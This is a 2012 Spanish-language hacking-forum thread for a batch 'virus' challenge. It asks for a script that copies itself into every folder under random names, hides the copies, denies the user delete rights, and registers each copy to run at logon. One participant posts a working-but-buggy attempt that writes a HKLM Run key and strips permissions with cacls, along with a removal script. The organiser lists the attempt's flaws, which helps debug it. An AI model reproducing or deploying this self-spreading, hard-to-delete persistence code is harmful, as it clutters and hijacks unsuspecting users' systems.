[Reto Batch] VIRUS HELLO !!

Iniciado por Eleкtro, 9 Mayo 2012, 15:19 PM

0 Miembros y 3 Visitantes están viendo este tema.

Eleкtro

Aquí pueden comentar todo lo que quieran, sus dudas, avances o soluciones acerca del siguiente reto:


Reto Nº 13

Nombre:           Virus HELLO !! (Elektro H@cker)
Dificultad:         5/10
Objetivo:          Crea un bat que cumpla estas funciones:


  • El bat se debe autocopiar a si mismo en TODAS las carpetas y subcarpetas del PC.
  • Cada vez que se crea una copia, La copia debe tener un nombre distinto al Bat original, Un nombre aleatorio, Para que séa más dificil de localizar las copias y eliminarlas.
  • Cada copia debe tener el atributo de archivo OCULTO y SOLO LECTURA
  • Cada copia debe tener los privilegios de usuario DENEGADOS A LA ELIMINACIÓN para impedir que el archivo se elimine facilmente.
  • Se debe crear una taréa programada o una clave de registro en el sistema que ejecute CADA COPIA al iniciar sesión en la cuenta de ese usuario.
  • Cada copia solamente debe mostrar un mensaje de ECHO **** y el comando Pause, NO DEBE VOLVER A AUTOCOPIARSE cuando se ejecute la taréa.

- Con lo cual nos quedará un bonito inicio de sesión :D que ejecutará unas +15.000 copias de un bat dificil de borrar para un usuario novato.
PD: La intención de este reto es que aprendan a usar comandos muy importantes!.

Indicaciones:   Las carpetas que necesiten privilegios de admin no tiene importancia.
Pistas:              Comandos: SET /?, FOR /? /?, SCHT???S, REG ???, A??RIB, ?CACLS, ????OWN.
Ejemplo:
                              
Solución:         Pedir por mensaje privado








$Edu$

No podes poner que esos nombres "aleatorios" empiecen con "elektroH" quedando por ejemplo: "elektroH54657.bat" , "elektroH423489.bat" Asi luego haces la continuacion de este reto que seria la vacuna para este virus. Y tambien ayuda para cuando anden probando sus codigos, que se les haria un caos con tantos .bats, y si van programando la vacuna en paralelo, podran eliminar los bats para seguir haciendo pruebas sin "ensuciar" la pc xD

Eleкtro

Cita de: $Edu$ en  9 Mayo 2012, 15:31 PM
No podes poner que esos nombres "aleatorios" empiecen con "elektroH" quedando por ejemplo: "elektroH54657.bat" , "elektroH423489.bat" Asi luego haces la continuacion de este reto que seria la vacuna para este virus. Y tambien ayuda para cuando anden probando sus codigos, que se les haria un caos con tantos .bats, y si van programando la vacuna en paralelo, podran eliminar los bats para seguir haciendo pruebas sin "ensuciar" la pc xD

Bueno, Las pruebas se pueden hacer en un directorio que contenga 2 subcarpetas (CD "CARPETA TEST..."), Así no se ensucia.

La vacuna sería muy fácil aun con nombres aleatorios, Solo hay que buscar parte del código del bat que hagan con "TYPE + FIND", En todos los bats del pc, Y si encuentra alguna coincidencia pues elimina ese bat con "DEL" XD.

Salu2!








79137913

HOLA!!!

Ni a palos hago esto, a no ser que alguien postee la vacuna por que me va a llenar la pc de basura cada testeo que haga.

GRACIAS POR LEER!!!
"Como no se puede igualar a Dios, ya he decidido que hacer, ¡SUPERARLO!"
"La peor de las ignorancias es no saber corregirlas"

79137913                          *Shadow Scouts Team*

BatchianoISpyxolo

No se ve muy complejo y a la vez interesante... A ver si me pongo con los retos en algún momento :)
Puede que desees aprender a programar desde 0: www.espascal.es

$Edu$

Ahi va, hay que probar si anda dentro de una carpeta, luego confiarse que andara para todas las carpetas del pc.

Yo en otro tema te pregunte como hacer esto Elektro.. dime si no soy bueno dando ideas implicitas xDDD
Algun dia hare los retos para demostrar que no se requiere saber mucho batch para hacer muchas cosas, obviamente que no sera la misma calidad pero resolver se resuelve que es la idea. Digo esto porque algunos se asustan (yo a veces tambien xD) cuando ven codigos que hace Elektro xDD con cosas en otro idioma parece xDD

-- KiLiaN --

Entren al chat de elhacker.net
    
   

@kln13

Eleкtro

Cita de: $Edu$ en  9 Mayo 2012, 17:19 PM
Algun dia hare los retos para demostrar que no se requiere saber mucho batch para hacer muchas cosas,
Este reto es fácil y Batch también, en menos de 30 lineas se puede simplificar, Y los comandos necesarios ya los dije, vamos!  ;)

Cita de: $Edu$ en  9 Mayo 2012, 17:19 PM
Digo esto porque algunos se asustan (yo a veces tambien xD) cuando ven codigos que hace Elektro xDD con cosas en otro idioma parece xDD
Yo nunca me puse una medalla de "Maestro/Genio de Batch"  :xD, Que quede claro! xD, Aunque si que considero que conozco el 99% acerca de Batch, Pero cualquiera puede conocerlo a la perfección y hacer buenos codes si lo estudia CON GANAS, No hay demasiado que aprender y en eso tienes razón $Edu$.  

Salu2.








-- KiLiaN --

#8
Vale con esto? Se me ha roto el pc (creo que murió la gráfica.. :-[, se me apagó de repente y enciende y tal pero ahi se queda..en fin ya lo investigaré..) y ahora mismo sólo dispongo de windows xp en el portatil asique hago lo que puedo..He puesto un principio en el nombre para poder borrarlo con la vacuna con más facilidad.

@Echo off
Setlocal enabledelayedexpansion
Color 02
:: -- KiLiaN --
Echo Foro.elhacker.net -^> reto Batch Numero 13

For /D /R %%i in (*) do (cd %%i & if exist kln*.bat (Echo ** & pause & exit /B) else (
set var=kln%random%.bat
Echo Echo ***> !var!
Echo pause>>!var!
attrib +r +h !var!
cacls !var! /E /P %USERNAME%:N>nul
reg Add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Reto!var!" /d "start /w %%i\!var!" /F))


PD: He previsualizado y veo que el código sale con mas cosas asique el la variable %USERNAME% y el nombre del registro hay que cambiarlos cuando lo copieis..


Aqui mi vacuna, el registro lo limpio con ccleaner o con msconfig que solo hay que seleccionar y pulsar suprimir xD

Código (dos) [Seleccionar]
@Echo off
Setlocal enabledelayedexpansion
color 02
:: By -- KiLiaN --
Echo Foro.elhacker.net -^> Vacuna para el reto Batch Numero 13

For /D /R %%i in (*) do (
cd %%i
Cacls kln*.bat /E /P %USERNAME%:F
Attrib -r -h kln*.bat
Del /Q kln*.bat))
Entren al chat de elhacker.net
    
   

@kln13

Eleкtro

Cita de: -- KiLiaN -- en 10 Mayo 2012, 17:54 PM
Vale con esto?

No puedo aceptar la solución, Hay errores importantes:
cd %%i
> Si la variable contiene espacios no podrás acceder a esa carpeta

set var=kln%random%.bat
> El número aleatorio no cambia de valor, siempre será el mismo. (Dejo que averigues el porqué :P)

cacls !var! /E /P %USERNAME%:N>nul
> las copias no van a funcionar al ejecutarse windows porque le has quitado el derecho de lectura (Bueno, le has quitado todos).

Saludos